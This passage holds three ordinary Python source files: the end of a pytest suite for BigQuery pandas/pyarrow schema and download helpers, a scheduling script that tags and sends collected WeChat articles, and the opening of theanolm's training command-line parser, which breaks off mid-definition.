module_under_test.dataframe_to_bq_schema(dataframe, dict_schema) expected_schema = ( schema.SchemaField("str_column", "STRING", "NULLABLE"), schema.SchemaField("int_column", "INTEGER", "NULLABLE"), schema.SchemaField("bool_column", "BOOL", "REQUIRED"), ) assert returned_schema == expected_schema @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_arrow_with_multiindex(module_under_test): bq_schema = ( schema.SchemaField("str_index", "STRING"), # int_index is intentionally omitted, to verify that it's okay to be # missing indexes from the schema. schema.SchemaField("dt_index", "DATETIME"), schema.SchemaField("int_col", "INTEGER"), schema.SchemaField("nullable_int_col", "INTEGER"), schema.SchemaField("str_col", "STRING"), ) df_data = collections.OrderedDict( [ ("int_col", [1, 2, 3, 4, 5, 6]), ("nullable_int_col", [6.0, float("nan"), 7.0, float("nan"), 8.0, 9.0]), ("str_col", ["apple", "banana", "cherry", "durian", "etrog", "fig"]), ] ) df_index = pandas.MultiIndex.from_tuples( [ ("a", 0, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)), ("a", 0, datetime.datetime(2000, 1, 1, 0, 0, 0)), ("a", 1, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)), ("b", 1, datetime.datetime(2000, 1, 1, 0, 0, 0)), ("b", 0, datetime.datetime(1999, 12, 31, 23, 59, 59, 999999)), ("b", 0, datetime.datetime(2000, 1, 1, 0, 0, 0)), ], names=["str_index", "int_index", "dt_index"], ) dataframe = pandas.DataFrame(df_data, index=df_index) arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema) assert arrow_table.schema.names == [ "str_index", "dt_index", "int_col", "nullable_int_col", "str_col", ] arrow_data = arrow_table.to_pydict() assert arrow_data["str_index"] == ["a", "a", "a", "b", "b", "b"] expected_dt_index = [ pandas.Timestamp(dt) for dt in ( datetime.datetime(1999, 12, 31, 23, 59, 59, 999999), datetime.datetime(2000, 1, 1, 0, 0, 0), datetime.datetime(1999, 12, 31, 23, 59, 59, 999999), datetime.datetime(2000, 1, 1, 0, 0, 0), datetime.datetime(1999, 12, 31, 23, 59, 59, 999999), datetime.datetime(2000, 1, 1, 0, 0, 0), ) ] assert arrow_data["dt_index"] == expected_dt_index assert arrow_data["int_col"] == [1, 2, 3, 4, 5, 6] assert arrow_data["nullable_int_col"] == [6, None, 7, None, 8, 9] assert arrow_data["str_col"] == [ "apple", "banana", "cherry", "durian", "etrog", "fig", ] @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_arrow_with_required_fields(module_under_test): bq_schema = ( schema.SchemaField("field01", "STRING", mode="REQUIRED"), schema.SchemaField("field02", "BYTES", mode="REQUIRED"), schema.SchemaField("field03", "INTEGER", mode="REQUIRED"), schema.SchemaField("field04", "INT64", mode="REQUIRED"), schema.SchemaField("field05", "FLOAT", mode="REQUIRED"), schema.SchemaField("field06", "FLOAT64", mode="REQUIRED"), schema.SchemaField("field07", "NUMERIC", mode="REQUIRED"), schema.SchemaField("field08", "BIGNUMERIC", mode="REQUIRED"), schema.SchemaField("field09", "BOOLEAN", mode="REQUIRED"), schema.SchemaField("field10", "BOOL", mode="REQUIRED"), schema.SchemaField("field11", "TIMESTAMP", mode="REQUIRED"), schema.SchemaField("field12", "DATE", mode="REQUIRED"), schema.SchemaField("field13", "TIME", mode="REQUIRED"), schema.SchemaField("field14", "DATETIME", mode="REQUIRED"), schema.SchemaField("field15", "GEOGRAPHY", mode="REQUIRED"), ) data = { "field01": ["hello", "world"], "field02": [b"abd", b"efg"], "field03": [1, 2], "field04": [3, 4], "field05": [1.25, 9.75], "field06": [-1.75, -3.5], "field07": [decimal.Decimal("1.2345"), decimal.Decimal("6.7891")], "field08": [ decimal.Decimal("-{d38}.{d38}".format(d38="9" * 38)), decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)), ], "field09": [True, False], "field10": [False, True], "field11": [ datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc), datetime.datetime(2012, 12, 21, 9, 7, 42, tzinfo=datetime.timezone.utc), ], "field12": [datetime.date(9999, 12, 31), datetime.date(1970, 1, 1)], "field13": [datetime.time(23, 59, 59, 999999), datetime.time(12, 0, 0)], "field14": [ datetime.datetime(1970, 1, 1, 0, 0, 0), datetime.datetime(2012, 12, 21, 9, 7, 42), ], "field15": ["POINT(30 10)", "POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))"], } dataframe = pandas.DataFrame(data) arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema) arrow_schema = arrow_table.schema assert len(arrow_schema) == len(bq_schema) for arrow_field in arrow_schema: assert not arrow_field.nullable @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_arrow_with_unknown_type(module_under_test): bq_schema = ( schema.SchemaField("field00", "UNKNOWN_TYPE"), schema.SchemaField("field01", "STRING"), schema.SchemaField("field02", "BYTES"), schema.SchemaField("field03", "INTEGER"), ) dataframe = pandas.DataFrame( { "field00": ["whoami", "whatami"], "field01": ["hello", "world"], "field02": [b"abd", b"efg"], "field03": [1, 2], } ) with warnings.catch_warnings(record=True) as warned: arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema) arrow_schema = arrow_table.schema assert len(warned) == 1 warning = warned[0] assert "field00" in str(warning) assert len(arrow_schema) == len(bq_schema) assert arrow_schema[0].name == "field00" assert arrow_schema[1].name == "field01" assert arrow_schema[2].name == "field02" assert arrow_schema[3].name == "field03" @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_arrow_dict_sequence_schema(module_under_test): dict_schema = [ {"name": "field01", "type": "STRING", "mode": "REQUIRED"}, {"name": "field02", "type": "BOOL", "mode": "NULLABLE"}, ] dataframe = pandas.DataFrame( {"field01": ["hello", "world"], "field02": [True, False]} ) arrow_table = module_under_test.dataframe_to_arrow(dataframe, dict_schema) arrow_schema = arrow_table.schema expected_fields = [ pyarrow.field("field01", "string", nullable=False), pyarrow.field("field02", "bool", nullable=True), ] assert list(arrow_schema) == expected_fields @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_parquet_w_extra_fields(module_under_test): with pytest.raises(ValueError) as exc_context: module_under_test.dataframe_to_parquet( pandas.DataFrame(), (schema.SchemaField("not_in_df", "STRING"),), None ) message = str(exc_context.value) assert "bq_schema contains fields not present in dataframe" in message assert "not_in_df" in message @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_parquet_w_missing_fields(module_under_test): with pytest.raises(ValueError) as exc_context: module_under_test.dataframe_to_parquet( pandas.DataFrame({"not_in_bq": [1, 2, 3]}), (), None ) message = str(exc_context.value) assert "bq_schema is missing fields from dataframe" in message assert "not_in_bq" in message @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_parquet_compression_method(module_under_test): bq_schema = (schema.SchemaField("field00", "STRING"),) dataframe = pandas.DataFrame({"field00": ["foo", "bar"]}) write_table_patch = mock.patch.object( module_under_test.pyarrow.parquet, "write_table", autospec=True ) with write_table_patch as fake_write_table: module_under_test.dataframe_to_parquet( dataframe, bq_schema, None, parquet_compression="ZSTD" ) call_args = fake_write_table.call_args assert call_args is not None assert call_args.kwargs.get("compression") == "ZSTD" @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow(module_under_test): dataframe = pandas.DataFrame( data=[ {"id": 10, "status": "FOO", "created_at": datetime.date(2019, 5, 10)}, {"id": 20, "status": "BAR", "created_at": datetime.date(2018, 9, 12)}, ] ) with warnings.catch_warnings(record=True) as warned: detected_schema = module_under_test.dataframe_to_bq_schema( dataframe, bq_schema=[] ) expected_schema = ( schema.SchemaField("id", "INTEGER", mode="NULLABLE"), schema.SchemaField("status", "STRING", mode="NULLABLE"), schema.SchemaField("created_at", "DATE", mode="NULLABLE"), ) by_name = operator.attrgetter("name") assert sorted(detected_schema, key=by_name) == sorted(expected_schema, key=by_name) # there should be no relevant warnings unwanted_warnings = [ warning for warning in warned if "could not determine" in str(warning).lower() ] assert not unwanted_warnings @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test): dataframe = pandas.DataFrame( data=[ {"struct_field": {"one": 2}, "status": "FOO"}, {"struct_field": {"two": "222"}, "status": "BAR"}, ] ) with warnings.catch_warnings(record=True) as warned: detected_schema = module_under_test.dataframe_to_bq_schema( dataframe, bq_schema=[] ) assert detected_schema is None # a warning should also be issued expected_warnings = [ warning for warning in warned if "could not determine" in str(warning).lower() ] assert len(expected_warnings) == 1 assert "struct_field" in str(expected_warnings[0]) @pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`") def test_dataframe_to_bq_schema_geography(module_under_test): from shapely import wkt df = geopandas.GeoDataFrame( pandas.DataFrame( dict( name=["foo", "bar"], geo1=[None, None], geo2=[None, wkt.loads("Point(1 1)")], ) ), geometry="geo1", ) bq_schema = module_under_test.dataframe_to_bq_schema(df, []) assert bq_schema == ( schema.SchemaField("name", "STRING"), schema.SchemaField("geo1", "GEOGRAPHY"), schema.SchemaField("geo2", "GEOGRAPHY"), ) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test__first_array_valid_no_valid_items(module_under_test): series = pandas.Series([None, pandas.NA, float("NaN")]) result = module_under_test._first_array_valid(series) assert result is None @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test__first_array_valid_valid_item_exists(module_under_test): series = pandas.Series([None, [0], [1], None]) result = module_under_test._first_array_valid(series) assert result == 0 @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test__first_array_valid_all_nan_items_in_first_valid_candidate(module_under_test): import numpy series = pandas.Series( [ None, [None, float("NaN"), pandas.NA, pandas.NaT, numpy.nan], None, [None, None], [None, float("NaN"), pandas.NA, pandas.NaT, numpy.nan, 42, None], [1, 2, 3], None, ] ) result = module_under_test._first_array_valid(series) assert result == 42 @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test__first_array_valid_no_arrays_with_valid_items(module_under_test): series = pandas.Series([[None, None], [None, None]]) result = module_under_test._first_array_valid(series) assert result is None @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_augment_schema_type_detection_succeeds(module_under_test): dataframe = pandas.DataFrame( data=[ { "bool_field": False, "int_field": 123, "float_field": 3.141592, "time_field": datetime.time(17, 59, 47), "timestamp_field": datetime.datetime(2005, 5, 31, 14, 25, 55), "date_field": datetime.date(2005, 5, 31), "bytes_field": b"some bytes", "string_field": "some characters", "numeric_field": decimal.Decimal("123.456"), "bignumeric_field": decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)), } ] ) # NOTE: In Pandas dataframe, the dtype of Python's datetime instances is # set to "datetime64[ns]", and pyarrow converts that to pyarrow.TimestampArray. # We thus cannot expect to get a DATETIME date when converting back to the # BigQuery type. current_schema = ( schema.SchemaField("bool_field", field_type=None, mode="NULLABLE"), schema.SchemaField("int_field", field_type=None, mode="NULLABLE"), schema.SchemaField("float_field", field_type=None, mode="NULLABLE"), schema.SchemaField("time_field", field_type=None, mode="NULLABLE"), schema.SchemaField("timestamp_field", field_type=None, mode="NULLABLE"), schema.SchemaField("date_field", field_type=None, mode="NULLABLE"), schema.SchemaField("bytes_field", field_type=None, mode="NULLABLE"), schema.SchemaField("string_field", field_type=None, mode="NULLABLE"), schema.SchemaField("numeric_field", field_type=None, mode="NULLABLE"), schema.SchemaField("bignumeric_field", field_type=None, mode="NULLABLE"), ) with warnings.catch_warnings(record=True) as warned: augmented_schema = module_under_test.augment_schema(dataframe, current_schema) # there should be no relevant warnings unwanted_warnings = [ warning for warning in warned if "Pyarrow could not" in str(warning) ] assert not unwanted_warnings # the augmented schema must match the expected expected_schema = ( schema.SchemaField("bool_field", field_type="BOOL", mode="NULLABLE"), schema.SchemaField("int_field", field_type="INT64", mode="NULLABLE"), schema.SchemaField("float_field", field_type="FLOAT64", mode="NULLABLE"), schema.SchemaField("time_field", field_type="TIME", mode="NULLABLE"), schema.SchemaField("timestamp_field", field_type="TIMESTAMP", mode="NULLABLE"), schema.SchemaField("date_field", field_type="DATE", mode="NULLABLE"), schema.SchemaField("bytes_field", field_type="BYTES", mode="NULLABLE"), schema.SchemaField("string_field", field_type="STRING", mode="NULLABLE"), schema.SchemaField("numeric_field", field_type="NUMERIC", mode="NULLABLE"), schema.SchemaField( "bignumeric_field", field_type="BIGNUMERIC", mode="NULLABLE" ), ) by_name = operator.attrgetter("name") assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_augment_schema_repeated_fields(module_under_test): dataframe = pandas.DataFrame( data=[ # Include some values useless for type detection to make sure the logic # indeed finds the value that is suitable. {"string_array": None, "timestamp_array": None, "datetime_array": None}, { "string_array": [None], "timestamp_array": [None], "datetime_array": [None], }, {"string_array": None, "timestamp_array": None, "datetime_array": None}, { "string_array": [None, "foo"], "timestamp_array": [ None, datetime.datetime( 2005, 5, 31, 14, 25, 55, tzinfo=datetime.timezone.utc ), ], "datetime_array": [None, datetime.datetime(2005, 5, 31, 14, 25, 55)], }, {"string_array": None, "timestamp_array": None, "datetime_array": None}, ] ) current_schema = ( schema.SchemaField("string_array", field_type=None, mode="NULLABLE"), schema.SchemaField("timestamp_array", field_type=None, mode="NULLABLE"), schema.SchemaField("datetime_array", field_type=None, mode="NULLABLE"), ) with warnings.catch_warnings(record=True) as warned: augmented_schema = module_under_test.augment_schema(dataframe, current_schema) # there should be no relevant warnings unwanted_warnings = [ warning for warning in warned if "Pyarrow could not" in str(warning) ] assert not unwanted_warnings # the augmented schema must match the expected expected_schema = ( schema.SchemaField("string_array", field_type="STRING", mode="REPEATED"), schema.SchemaField("timestamp_array", field_type="TIMESTAMP", mode="REPEATED"), schema.SchemaField("datetime_array", field_type="DATETIME", mode="REPEATED"), ) by_name = operator.attrgetter("name") assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_augment_schema_type_detection_fails(module_under_test): dataframe = pandas.DataFrame( data=[ { "status": "FOO", "struct_field": {"one": 1}, "struct_field_2": {"foo": "123"}, }, { "status": "BAR", "struct_field": {"two": "111"}, "struct_field_2": {"bar": 27}, }, ] ) current_schema = [ schema.SchemaField("status", field_type="STRING", mode="NULLABLE"), schema.SchemaField("struct_field", field_type=None, mode="NULLABLE"), schema.SchemaField("struct_field_2", field_type=None, mode="NULLABLE"), ] with warnings.catch_warnings(record=True) as warned: augmented_schema = module_under_test.augment_schema(dataframe, current_schema) assert augmented_schema is None expected_warnings = [ warning for warning in warned if "could not determine" in str(warning) ] assert len(expected_warnings) == 1 warning_msg = str(expected_warnings[0]) assert "pyarrow" in warning_msg.lower() assert "struct_field" in warning_msg and "struct_field_2" in warning_msg @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_augment_schema_type_detection_fails_array_data(module_under_test): dataframe = pandas.DataFrame( data=[{"all_none_array": [None, float("NaN")], "empty_array": []}] ) current_schema = [ schema.SchemaField("all_none_array", field_type=None, mode="NULLABLE"), schema.SchemaField("empty_array", field_type=None, mode="NULLABLE"), ] with warnings.catch_warnings(record=True) as warned: augmented_schema = module_under_test.augment_schema(dataframe, current_schema) assert augmented_schema is None expected_warnings = [ warning for warning in warned if "could not determine" in str(warning) ] assert len(expected_warnings) == 1 warning_msg = str(expected_warnings[0]) assert "pyarrow" in warning_msg.lower() assert "all_none_array" in warning_msg and "empty_array" in warning_msg def test_dataframe_to_parquet_dict_sequence_schema(module_under_test): pandas = pytest.importorskip("pandas") dict_schema = [ {"name": "field01", "type": "STRING", "mode": "REQUIRED"}, {"name": "field02", "type": "BOOL", "mode": "NULLABLE"}, ] dataframe = pandas.DataFrame( {"field01": ["hello", "world"], "field02": [True, False]} ) write_table_patch = mock.patch.object( module_under_test.pyarrow.parquet, "write_table", autospec=True ) to_arrow_patch = mock.patch.object( module_under_test, "dataframe_to_arrow", autospec=True ) with write_table_patch, to_arrow_patch as fake_to_arrow: module_under_test.dataframe_to_parquet(dataframe, dict_schema, None) expected_schema_arg = [ schema.SchemaField("field01", "STRING", mode="REQUIRED"), schema.SchemaField("field02", "BOOL", mode="NULLABLE"), ] schema_arg = fake_to_arrow.call_args.args[1] assert schema_arg == expected_schema_arg def test__download_table_bqstorage_stream_includes_read_session( monkeypatch, module_under_test ): import google.cloud.bigquery_storage_v1.reader import google.cloud.bigquery_storage_v1.types monkeypatch.setattr(_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None) monkeypatch.setattr(bigquery_storage, "__version__", "2.5.0") bqstorage_client = mock.create_autospec( bigquery_storage.BigQueryReadClient, instance=True ) reader = mock.create_autospec( google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True ) bqstorage_client.read_rows.return_value = reader session = google.cloud.bigquery_storage_v1.types.ReadSession() module_under_test._download_table_bqstorage_stream( module_under_test._DownloadState(), bqstorage_client, session, google.cloud.bigquery_storage_v1.types.ReadStream(name="test"), queue.Queue(), mock.Mock(), ) reader.rows.assert_called_once_with(session) @pytest.mark.skipif( not _helpers.BQ_STORAGE_VERSIONS.is_read_session_optional, reason="Requires `google-cloud-bigquery-storage` >= 2.6.0", ) def test__download_table_bqstorage_stream_omits_read_session( monkeypatch, module_under_test ): import google.cloud.bigquery_storage_v1.reader import google.cloud.bigquery_storage_v1.types monkeypatch.setattr(_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None) monkeypatch.setattr(bigquery_storage, "__version__", "2.6.0") bqstorage_client = mock.create_autospec( bigquery_storage.BigQueryReadClient, instance=True ) reader = mock.create_autospec( google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True ) bqstorage_client.read_rows.return_value = reader session = google.cloud.bigquery_storage_v1.types.ReadSession() module_under_test._download_table_bqstorage_stream( module_under_test._DownloadState(), bqstorage_client, session, google.cloud.bigquery_storage_v1.types.ReadStream(name="test"), queue.Queue(), mock.Mock(), ) reader.rows.assert_called_once_with() @pytest.mark.parametrize( "stream_count,maxsize_kwarg,expected_call_count,expected_maxsize", [ (3, {"max_queue_size": 2}, 3, 2), # custom queue size (4, {}, 4, 4), # default queue size (7, {"max_queue_size": None}, 7, 0), # infinite queue size ], ) def test__download_table_bqstorage( module_under_test, stream_count, maxsize_kwarg, expected_call_count, expected_maxsize, ): from google.cloud.bigquery import dataset from google.cloud.bigquery import table queue_used = None # A reference to the queue used by code under test. bqstorage_client = mock.create_autospec( bigquery_storage.BigQueryReadClient, instance=True ) fake_session = mock.Mock(streams=["stream/s{i}" for i in range(stream_count)]) bqstorage_client.create_read_session.return_value = fake_session table_ref = table.TableReference( dataset.DatasetReference("project-x", "dataset-y"), "table-z", ) def fake_download_stream( download_state, bqstorage_client, session, stream, worker_queue, page_to_item ): nonlocal queue_used queue_used = worker_queue try: worker_queue.put_nowait("result_page") except queue.Full: # pragma: NO COVER pass download_stream = mock.Mock(side_effect=fake_download_stream) with mock.patch.object( module_under_test, "_download_table_bqstorage_stream", new=download_stream ): result_gen = module_under_test._download_table_bqstorage( "some-project", table_ref, bqstorage_client, **maxsize_kwarg ) list(result_gen) # Timing-safe, as the method under test should block until the pool shutdown is # complete, at which point all download stream workers have already been submitted # to the thread pool. assert download_stream.call_count == stream_count # once for each stream assert queue_used.maxsize == expected_maxsize def test_download_arrow_row_iterator_unknown_field_type(module_under_test): fake_page = api_core.page_iterator.Page( parent=mock.Mock(), items=[{"page_data": "foo"}], item_to_value=api_core.page_iterator._item_to_value_identity, ) fake_page._columns = [[1, 10, 100], [2.2, 22.22, 222.222]] pages = [fake_page] bq_schema = [ schema.SchemaField("population_size", "INTEGER"), schema.SchemaField("alien_field", "ALIEN_FLOAT_TYPE"), ] results_gen = module_under_test.download_arrow_row_iterator(pages, bq_schema) with warnings.catch_warnings(record=True) as warned: result = next(results_gen) unwanted_warnings = [ warning for warning in warned if "please pass schema= explicitly" in str(warning).lower() ] assert not unwanted_warnings assert len(result.columns) == 2 col = result.columns[0] assert type(col) is pyarrow.lib.Int64Array assert col.to_pylist() == [1, 10, 100] col = result.columns[1] assert type(col) is pyarrow.lib.DoubleArray assert col.to_pylist() == [2.2, 22.22, 222.222] def test_download_arrow_row_iterator_known_field_type(module_under_test): fake_page = api_core.page_iterator.Page( parent=mock.Mock(), items=[{"page_data": "foo"}], item_to_value=api_core.page_iterator._item_to_value_identity, ) fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]] pages = [fake_page] bq_schema = [ schema.SchemaField("population_size", "INTEGER"), schema.SchemaField("non_alien_field", "STRING"), ] results_gen = module_under_test.download_arrow_row_iterator(pages, bq_schema) with warnings.catch_warnings(record=True) as warned: result = next(results_gen) unwanted_warnings = [ warning for warning in warned if "please pass schema= explicitly" in str(warning).lower() ] assert not unwanted_warnings assert len(result.columns) == 2 col = result.columns[0] assert type(col) is pyarrow.lib.Int64Array assert col.to_pylist() == [1, 10, 100] col = result.columns[1] assert type(col) is pyarrow.lib.StringArray assert col.to_pylist() == ["2.2", "22.22", "222.222"] def test_download_arrow_row_iterator_dict_sequence_schema(module_under_test): fake_page = api_core.page_iterator.Page( parent=mock.Mock(), items=[{"page_data": "foo"}], item_to_value=api_core.page_iterator._item_to_value_identity, ) fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]] pages = [fake_page] dict_schema = [ {"name": "population_size", "type": "INTEGER", "mode": "NULLABLE"}, {"name": "non_alien_field", "type": "STRING", "mode": "NULLABLE"}, ] results_gen = module_under_test.download_arrow_row_iterator(pages, dict_schema) result = next(results_gen) assert len(result.columns) == 2 col = result.columns[0] assert type(col) is pyarrow.lib.Int64Array assert col.to_pylist() == [1, 10, 100] col = result.columns[1] assert type(col) is pyarrow.lib.StringArray assert col.to_pylist() == ["2.2", "22.22", "222.222"] @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_download_dataframe_row_iterator_dict_sequence_schema(module_under_test): fake_page = api_core.page_iterator.Page( parent=mock.Mock(), items=[{"page_data": "foo"}], item_to_value=api_core.page_iterator._item_to_value_identity, ) fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]] pages = [fake_page] dict_schema = [ {"name": "population_size", "type": "INTEGER", "mode": "NULLABLE"}, {"name": "non_alien_field", "type": "STRING", "mode": "NULLABLE"}, ] results_gen = module_under_test.download_dataframe_row_iterator( pages, dict_schema, dtypes={} ) result = next(results_gen) expected_result = pandas.DataFrame( collections.OrderedDict( [ ("population_size", [1, 10, 100]), ("non_alien_field", ["2.2", "22.22", "222.222"]), ] ) ) assert result.equals(expected_result) with pytest.raises(StopIteration): result = next(results_gen) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_table_data_listpage_to_dataframe_skips_stop_iteration(module_under_test): dataframe = module_under_test._row_iterator_page_to_dataframe([], [], {}) assert isinstance(dataframe, pandas.DataFrame) def test_bq_to_arrow_field_type_override(module_under_test): # When loading pandas data, we may need to override the type # decision based on data contents, because GEOGRAPHY data can be # stored as either text or binary. assert ( module_under_test.bq_to_arrow_field(schema.SchemaField("g", "GEOGRAPHY")).type == pyarrow.string() ) assert ( module_under_test.bq_to_arrow_field( schema.SchemaField("g", "GEOGRAPHY"), pyarrow.binary(), ).type == pyarrow.binary() ) @pytest.mark.parametrize( "field_type, metadata", [ ("datetime", {b"ARROW:extension:name": b"google:sqlType:datetime"}), ( "geography", { b"ARROW:extension:name": b"google:sqlType:geography", b"ARROW:extension:metadata": b'{"encoding": "WKT"}', }, ), ], ) def test_bq_to_arrow_field_metadata(module_under_test, field_type, metadata): assert ( module_under_test.bq_to_arrow_field( schema.SchemaField("g", field_type) ).metadata == metadata ) def test_verify_pandas_imports_no_pandas(module_under_test, monkeypatch): monkeypatch.setattr(module_under_test, "pandas", None) with pytest.raises(ValueError, match="Please install the 'pandas' package"): module_under_test.verify_pandas_imports() @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_verify_pandas_imports_no_db_dtypes(module_under_test, monkeypatch): monkeypatch.setattr(module_under_test, "db_dtypes", None) with pytest.raises(ValueError, match="Please install the 'db-dtypes' package"): module_under_test.verify_pandas_imports()
py
1a3f926e41b9f70ace8c5523b8fc86f590e2e59a
#!/usr/bin/env python """ Created by howie.hu at 2021/4/10. Description:常用调度函数 - 运行: 根目录执行,其中环境文件pro.env根据实际情况选择即可 - 命令: PIPENV_DOTENV_LOCATION=./pro.env pipenv run python src/schedule_task/all_tasks.py Changelog: all notable changes to this file will be documented """ import time from src.classifier import model_predict_factory from src.collector.collect_factory import collect_factory from src.config import Config from src.databases import MongodbManager from src.processor import fetch_keyword_list from src.sender import send_factory from src.utils.log import LOGGER def update_wechat_doc(): """ 抓取最新的文章,然后持久化到数据库 :param wechat_list: :return: """ # TODO 统一的地方进行配置管理 t_collect_type = "wechat_sougou" t_collect_config = { "wechat_list": Config.WECHAT_LIST, "delta_time": 5, # playwright "spider_type": "playwright", } collect_factory(t_collect_type, t_collect_config) def update_ads_tag(is_force=False): """ 对订阅的文章进行广告标记 :param is_force: 是否强制重新判决 :return: """ mongo_base = MongodbManager.get_mongo_base(mongodb_config=Config.MONGODB_CONFIG) coll = mongo_base.get_collection(coll_name="liuli_articles") if is_force: query = {} else: query = {"cos_model": {"$exists": False}} # 查找没有被标记的文章,基于相似度模型进行判断 for each_data in coll.find(query): doc_name = each_data["doc_name"] doc_link = each_data["doc_link"] doc_source_name = each_data["doc_source_name"] doc_content = each_data["doc_content"] doc_keywords = each_data.get("doc_keywords") if not doc_keywords: keyword_list = fetch_keyword_list(doc_content) doc_keywords = " ".join(keyword_list) each_data["doc_keywords"] = doc_keywords # 基于余弦相似度 cos_model_resp = model_predict_factory( model_name="cos", model_path="", input_dict={"text": doc_name + doc_keywords, "cos_value": Config.COS_VALUE}, # input_dict={"text": doc_name, "cos_value": Config.COS_VALUE}, ).to_dict() each_data["cos_model"] = cos_model_resp if cos_model_resp["result"] == 1: LOGGER.info( f"[{doc_source_name}] {doc_name} 被识别为广告[{cos_model_resp['probability']}],链接为:{each_data['doc_link']}" ) coll.update_one( filter={"doc_id": each_data["doc_id"]}, update={"$set": each_data}, upsert=True, ) def send_doc(): """ 对文章进行分发 :return: """ if Config.SENDER_LIST: # 是否启用分发器 mongo_base = MongodbManager.get_mongo_base(mongodb_config=Config.MONGODB_CONFIG) coll = mongo_base.get_collection(coll_name="liuli_articles") cur_ts = time.time() filter_dict = { # 时间范围,除第一次外后面其实可以去掉 "doc_ts": {"$gte": cur_ts - (2 * 24 * 60 * 60), "$lte": cur_ts}, # 至少打上一个模型标签 "cos_model": {"$exists": True}, } # 查找所有可分发文章 for each_data in coll.find(filter_dict): # 分别分发给各个目标 for send_type in Config.SENDER_LIST: # 暂时固定,测试 send_config = {} each_data["doc_cus_des"] = "🤓非广告" cos_model_resp = each_data["cos_model"] if cos_model_resp["result"] == 1: # 广告标记 each_data[ "doc_cus_des" ] = f"👿广告[概率:{cos_model_resp['probability']}]" send_factory( send_type=send_type, send_config=send_config, send_data=each_data ) else: LOGGER.info("未配置分发器!") if __name__ == "__main__": # 第一次启动请执行 # update_wechat_doc() # 每次强制重新打标签 # update_ads_tag(is_force=False) send_doc()
py
1a3f95da831c7d2fcbdd9f410a15c1467a9401e7
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """A module that implements the "theanolm train" command. """ import sys import mmap import logging import h5py import numpy import theano from theanolm import Vocabulary, Architecture, Network from theanolm.backend import TextFileType, get_default_device from theanolm.parsing import LinearBatchIterator from theanolm.training import Trainer, create_optimizer, CrossEntropyCost, \ NCECost, BlackoutCost from theanolm.scoring import TextScorer from theanolm.vocabulary import compute_word_counts def add_arguments(parser): """Specifies the command line arguments supported by the "theanolm train" command. :type parser: argparse.ArgumentParser :param parser: a command line argument parser """ argument_group = parser.add_argument_group("data") argument_group.add_argument( 'model_path', metavar='MODEL-FILE', type=str, help='path where the best model state will be saved in HDF5 binary ' 'data format') argument_group.add_argument( '--training-set', metavar='FILE', type=TextFileType('r'), nargs='+', required=True, help='text files containing training data (UTF-8, one sentence per ' 'line, assumed to be compressed if the name ends in ".gz")') argument_group.add_argument( '--validation-file', metavar='VALID-FILE', type=TextFileType('r'), default=None, help='text file containing validation data for early stopping (UTF-8, ' 'one sentence per line, assumed to be compressed if the name ends ' 'in ".gz")') argument_group = parser.add_argument_group("vocabulary") argument_group.add_argument( '--vocabulary', metavar='FILE', type=str, default=None, help='word or class vocabulary to be used in the neural network input ' 'and output, in the format specified by the --vocabulary-format ' 'argument (UTF-8 text, default is to use all the words from the ' 'training data)') argument_group.add_argument( '--vocabulary-format', metavar='FORMAT', type=str, default='words', choices=['words', 'classes', 'srilm-classes'], help='format of the file specified with --vocabulary argument, one of ' '"words" (one word per line, default), "classes" (word and class ' 'ID per line), "srilm-classes" (class name, membership ' 'probability, and word per line)') argument_group.add_argument( '--num-classes', metavar='N', type=int, default=None, help='generate N classes using a simple word frequency based algorithm ' 'when --vocabulary argument is not given (default is to not use ' 'word classes)') argument_group = parser.add_argument_group("network architecture") argument_group.add_argument( '--architecture', metavar='FILE', type=str, default='lstm300', help='path to neural network architecture description, or a standard ' 'architecture name, "lstm300" or "lstm1500" (default "lstm300")') argument_group = parser.add_argument_group("training process") argument_group.add_argument( '--sampling', metavar='FRACTION', type=float, nargs='*', default=[], help='randomly sample only FRACTION of each training file on each ' 'epoch (list the fractions in the same order as the training ' 'files)') argument_group.add_argument( '--sequence-length', metavar='N', type=int, default=100, help='ignore sentences longer than N words (default 100)') argument_group.add_argument( '--batch-size', metavar='N', type=int, default=16, help='each mini-batch will contain N sentences (default 16)') argument_group.add_argument( '--validation-frequency', 